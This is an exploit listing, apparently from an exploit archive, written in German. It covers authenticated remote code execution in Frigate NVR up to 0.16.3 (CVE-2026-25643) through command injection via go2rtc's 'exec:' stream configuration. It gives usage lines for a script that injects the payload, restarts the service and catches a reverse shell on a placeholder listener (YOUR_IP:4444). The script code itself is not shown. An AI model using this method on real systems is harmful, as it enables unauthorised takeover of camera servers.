
Exploit für Frigate NVR authentifizierte RCE über go2rtc exec: Protokollinjektion, Automatisierung der Ausführung von Systembefehlen und Erfassung einer Reverse Shell.
Exploit-Titel: Frigate NVR <= 0.16.3 - authentifizierte Remote-Code-
Ausführung
Datum: 2026-02-05
Exploit-Autor: jduardo2704
Anbieter-Homepage: https://frigate.video/
Software-Link: https://github.com/blakeblackshear/frigate
Version: <= 0.16.3
CVE: CVE-2026-25643
Sicherheitshinweis: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
Frigate-Versionen bis einschließlich 0.16.3 sind anfällig für Remote-Code-Ausführung
(RCE) über die go2rtc-Konfiguration. Ein Angreifer mit authentifiziertem
Zugriff (oder ohne Authentifizierung, falls die Instanz offen ist) kann Systembefehle
über das exec:-Protokoll in die Stream-Konfiguration einschleusen. Dieser
Exploit automatisiert die Payload-Injektion, startet den Dienst neu und
fängt die Reverse-Shell ab.
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
Dieses Skript ist nur für Bildungszwecke und autorisierte Sicherheitstests gedacht.